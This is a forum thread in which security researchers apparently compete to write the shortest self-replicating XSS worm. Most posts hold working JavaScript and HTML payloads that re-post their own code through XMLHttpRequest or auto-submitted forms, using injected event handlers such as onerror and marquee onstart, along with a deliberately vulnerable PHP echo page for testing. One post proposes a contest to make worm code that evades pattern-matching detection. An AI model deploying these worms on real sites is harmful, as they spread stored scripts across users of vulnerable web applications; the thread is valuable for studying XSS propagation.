nice one!

but firefox 1.5.x says "z is not defined"? i assume it does work in FF2.0 ?

i'm off to sleep, i'll try and continue playing later this week :)

http://www.sirdarckcat.net/post.html

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Quote
.mario
(...)I expect you to recognize the error in a second(...)

p="alert('XSS');x=/*@cc_on!@*/1?new XMLHttpsRequest:new ActiveXObjekt('Microsoft.XMLHTTP');x.open('post','post.php');x.setRequestHeader('content-type','application/x-www-form-urlencoded');x.send('content=p=\"'+p+'\";'+p);if(!i){e(p);i=1}";
e=eval;e(p)

The only web 2.0 trial, what's wrong:
-XMLHttpsRequest->XMLHttpRequest (where/for who have you've been coding ;-)
-ActiveXObjekt->ActiveXObject (not needed, so is the /*@cc_on!@*/)
-x.send('content=p=\"'+p+'\";'+p); p twice!, \" get's lost after the first decoding, p is not encoded!, doesn't include script tags & eval(p)! (I know there is e(p), but e is undefined if posted & it's just a string that's never evaluated).
-if(!i){e(p);i=1} e is undefined if posted (will only stop the script from running twice on the same page).
Note: you didn't included the <script></script> tags, which's counts and will be needed ...

Quote
.mario
that makes sure it won't loop on the first site it's executed

Good point! Because all implementations with <form> postings might loop on the form page, replicating itself indefinitely ...
That's why an XMLHttpRequest is nice, it only get's the page once and doesn't loop (other tricks/methods might work too).

My current (working) implementation with XMLHttpRequest:

<script>eval(y="alert('XSS');q=String.fromCharCode(34);(x=new XMLHttpRequest()).open('POST','post.php');x.send('content='+encodeURIComponent('<script>eval(y='+q+y+q+')</sc'+'ript>'))")</script>

(without setting the content-type, is this really needed when properly encoded?)
Nice features:
- 100% stable replication on FF2/IE7
- only runs once
- pure JavaScript, no crappy HTML or DOM knowledge etc...

Crap:
- 193 bytes
- q=String.fromCharCode(34); it is needed since any \" escaped encoding won't propagate itself right
- encodeURIComponent() only method that seems to do the job right (escape & encodeURI won't)

hmmm that's very odd

it only seems to work when i inject it just the way you did it:

<html><body>
<form id=z><INPUT name="content"><SCRIPT>with(z)alert('XSS',submit(action=(method='post')+'.php',content.value='<form id=z>'+innerHTML.substr(0,148)))</SCRIPT>

whereas when i inject it in a complete HTML page, it says "z is not defined" ..

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
	"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
  <title>blah</title>
</head>

<body>

<div id="container">

<form id=z><INPUT name="content"><SCRIPT>with(z)alert('XSS',submit(action=(method='post')+'.php',content.value='<form id=z>'+innerHTML.substr(0,148)))</SCRIPT>
    
  </div>
  
</body>
</html>

some kind of DOCTYPE compatibility switching going on here? i thought IE was the only browser that did that.

(btw this is the standard DOCTYPE i always copy from quirksmode.org, for me it's the one that has least browser incompatibilities when coding CSS)

well, the <div id=z> generates a warning on firefox, but still executes.. since it's not standard..

anyway, it should work on most sites..

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

@bwb labs: exactly: But I am surprised that the XHR in the reduced version runs on IE7 - this means we can consider this string as a good basis for a version shorter that 140 byte (currently 111 byte):

p="alert('XSS');x=new XMLHttpRequest;x.open('post','post.php');x.send('content=p=\"'+p+'\";');eval(p)";eval(p);

@.mario: you've stripped all the crap :-), but that introduces all the problems again ...
Note that eval(p="") is 2 bytes more efficient than p="";eval(p) it will add up, since you need is twice.

Alternative to eval, I tried some other method (not fully tested on IE7):

<script>f=function(){alert("XSS");(x=new XMLHttpRequest).open("post","post.php");x.send("content="+encodeURIComponent("<script>f="+f+";f()</sc"+"ript>"));};f()</script>

Nice features:
- only runs once
- pure JavaScript, no evil eval, no crappy HTML or DOM knowledge etc...
- no \" encoding crap
- 168 bytes

Crap:
- dubious function.toString() :-)
- bloat (space/tab/newline) in source!!! (and ' get's converted to ", and an extra ; is added)
- cannot reference to f in f: f=function(){reference to f}();
- still: encodeURIComponent() only method that seems to do the job right (escape & encodeURI won't)

@ bwb labs and mario:

the content-type is required on ff and ie, and everywhere

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

@sirdarckcat: is it really needed? Is it clientside or serverside dependent?

Quote
[url=http://www.w3.org/TR/XMLHttpRequest/#send
W3C XMLHttpRequest.send(data) specs link[/url]]Authors are strongly encouraged to ensure that they have specified the Content-Type header via setRequestHeader() before invoking send() with a non-null data argument.

@sirdarkcat - in my testing i could remove the " around the content name reducing the size by 2 bytes. Same goes for the non portable version.

<form id=z><INPUT name=content><SCRIPT>with(z)alert('XSS',submit(action=(method='post')+'.php',content.value='<form id=z>'+innerHTML.substr(0,146)))</SCRIPT>

157 bytes

btw: I will be very interested to see if someone can beat your solution.

@rsnake - perhaps after this would could look at a competition to create morphing worm code so it can't be so easily detected via pattern matching.

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'



Edited 1 time(s). Last edit at 01/05/2008 12:50AM by digi7al64.

Quote
digi7al64
in my testing i could remove the " around the content name

And what happened after one FF run? Due to the innerHTML & FF HTML fixing the quotes on name="content" back on, that was the discussion for a few posts long ... Please test all code before making statements.. (ok, I still have to do some testing with the Content-Type stuff ;-)

Two questions:

1) It doesn't have to be transparent does it?
2) Does the length of the replicated worm matter? (Does it have to submit the same thing every time?)

So here is the smallest I came up with given the fact that some things have to be met, but so do all the other vectors. I assume the form is already in a document where the XSS hole resides, this means most attrubutes are already set. So, I guess we only have to replicate the full page to let it become a worm.

<script>f.content.value=document.body.innerHTML+alert("xss");f.submit();</script>

It might need to be encoded properly which makes it slightly bigger. Anyway, this does replicate itself to infinity.

btw:

But, sorry to say, but I find the rules a bit confusing, because there are so many variables that can make all vectors here posted useless (like magic quotes for instance), and whether it has to just replicate it's data or just chnage it's location back where it came from (same results you see), and how the form looks like, does it has attributes to select upon or not? where it should be injected etc etc.

143 bytes:

<form id=z><input name=content><script>with(z)alert('XSS',submit(action=(method='post')+'.php',content.value='<form id=z>'+innerHTML))</script>

Tested in Firefox and IE, quotes are added to make name="content" second time and after. It worked fine with content around it in my tests so the substring was unnecessary.

Edit: I guess the added quotes make this technically 145 but that's still the smallest, no?



Edited 1 time(s). Last edit at 01/05/2008 04:29AM by Spikeman.

<form><input name=content type=image onerror="f=this.form;i=f.innerHTML.replace(/(.*)/,'<form>$1</form>');this.type='hidden';alert('XSS');f.action='post.php';f.method='post';f.content.value=escape(i);submit()" src=></form>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

*cough*

Mine is still the smallest. 80 chars.
82chars with an injection point( ">).

Here is the full code I tested:


Diminutive XSS Worm

(">)<script>f.content.value=document.body.innerHTML+alert('xss');f.submit();</script>

form file to inject & replicate:

<html>
<body><form name="f" action="post.php" method="post"><input name="content" /></form></body>
</html>

file to send to: post.php

<?php
echo $_REQUEST['content'];
?>

Extra
If we don't know the form names or field and we don't care about length but on universal usage, this could help making it more cool:

x=document.forms[0];for(i=0;i<x.elements.length;++i){x.elements.value=escape(document.body.innerHTML+alert('xss'));}x.submit();

can it be any smaller? ^^

sirdarckcat Wrote:
-------------------------------------------------------
> well, the <div id=z> generates a warning on firefox, but
> still executes.. since it's not standard..

maybe you misunderstood what i tried to say. i don't mean a warning, it says "z is not defined", that's not a warning, it's an error message telling that the variable 'z' does not appear within the scope.

> anyway, it should work on most sites..

i ran a few more tests with your entry a few times more and it appears that the thing that is going wrong, is that i have always been testing the injected code in a HTML environment with a proper DOCTYPE set.

if i remove the DOCTYPE, it works, if i enter the DOCTYPE it stops working.

now rsnake didn't state anything about DOCTYPE in the rules, so on that account i say it's still valid for the contest, but i don't think it will "work on most sites".

either way it's kind of academic, because in a real-world situation you can use prior knowledge (if you're lucky they even include prototype.js or some such library for you ;-) ), easily allowing for much, much smaller injection-strings.

@Spikeman: as far as i can gaher from the rules
1) it doesn't matter if the user sees what is going on
2) every generation of the worm needs to be identical (or, the largest version of its code counts)

@ronald: afaik, he rules state you may assume the script will unescape quotes etc properly on injection, so that's okay.
but it also says you may NOT assume any knowledge of the DOM tree. meaning, you gotta build the form yourself, as you cannot assume that any form is already there.

@Gareth: you can leave out the this inside an inline event handler, as this is the implied local scope anyway.

btw .. can anyone tell me if it's easy to get IE7 running via wine on ubuntu? cause it's kinda hard to keep competing if i can't test my entries myself ;-)

Hmmmm - to be honest I am a little bit tired of the vector assembly right now. I saw tons of great stuff, I am confused by the rules or at least the interpretation of them and nevertheless I learnt a lot of tricks I didn't know before so... have fun guys and congrats in advance to the winner ;)

Greetings,
.mario

Heh this is fun :)

167 chars I don't think I can make it smaller damn

<form><input name=content type=image onerror="f=form;i=f.innerHTML;type='hidden';alert('XSS');f.action=(f.method='post')+'.php';value=escape('<form>'+i);submit()" src>

The code has to be decoded correctly eg, + is + not space

<?php
$content = $_POST['content'];
if($content) {
echo urldecode(str_replace("+", "%2B",$content));
exit;
}
?>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]



Edited 1 time(s). Last edit at 01/05/2008 07:41AM by Gareth Heyes.

Ok here ya have ya form then:

<form name=content><marquee onstart="content.value=document.body.innerHTML+alert('xss');content.submit();">

or:

<form name="i"><input name="content"><marquee onstart="content.value=document.body.innerHTML+alert('xss');i.submit();">

lol msie of course!

Got my other down to 164 chars, I haven't got IE handy to test but I think it should work on FF + IE

<form><input name=content type=image onerror="with(form)action=(method='post')+'.php',i=escape('<form>'+innerHTML);value=i;type='hidden';alert('XSS');submit()" src>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

@Ronald: marquee fires an onstart in IE??? Hehe - that's damn cool ;)

full form: 139 chars

<form method=post action=post.php name=i><input name=content><script>content.value=document.body.innerHTML+alert('xss');i.submit();</script>

without form: 80 chars complete if form is already in the page:

<script>f.content.value=document.body.innerHTML+alert('xss');f.submit();</script>

That's it, I go for lunch see ya later.

@Ronald, i didn't check it, but it seems like your code submits the entire innerHTML of the body element, not just the worm code?

This is self replicating and should be identical:-

<script>(function(){alert('XSS');with(document)write('<form method=post action=post.php><input value='+escape('<script>('+arguments.callee+')()</scr'+'ipt>')+' name=content>'),forms[0].submit()})()</script>

Should work in IE as well

206 chars

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

EDIT: Removed 'cause onmouseover is not allowed.

@.mario: onstart is described with the marquee-example in the XSS-cheat sheet.

BTW: Why is <marquee> only working with JS enabled in FF ?



Edited 1 time(s). Last edit at 01/07/2008 02:10PM by Alex.

Slight variation which auto submits the form with a input image:-
<script>(function(){alert('XSS');document.write('<form method=post action=post.php><input type=image onerror="form.submit()" src><input value='+escape('<script>('+arguments.callee+')()</scr'+'ipt>')+' name=content>')})()</script>

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

@Alex: Ah - didn't have that in mind. Marquee isn't a W3C compliant tag and the Gecko team decided some time ago that it could be emulated - but they didn't build in native support so it requires JS/XBL.

http://developer.mozilla.org/en/docs/HTML:Element:marquee



Edited 1 time(s). Last edit at 01/05/2008 08:55AM by .mario.

Hmm, I think I've made a mistake. I haven't tested Ronald's code before. I just changed onstart to onmouseover and added A at the end.
As I can read in the specs from Mozilla about marquee it supports the event handler onstart also. But this doesn't work for me. So I thought, that this is the reason why Ronald said, that his code is only working IE. Well, so my code won't fix that. Always test before posting. ;)

---
~~Patching is for suckers~~

http://www.bitsploit.de



Edited 1 time(s). Last edit at 01/07/2008 02:09PM by Alex.

@ritz

My code replicates everything between the <body></body> including the JS itself.
I figured worms need a new instance to propagate further, not only the payload because that would be simply useless and not a real worm so to speak.

But you can only submit the JS through it in the same way, doesn't impact it actually.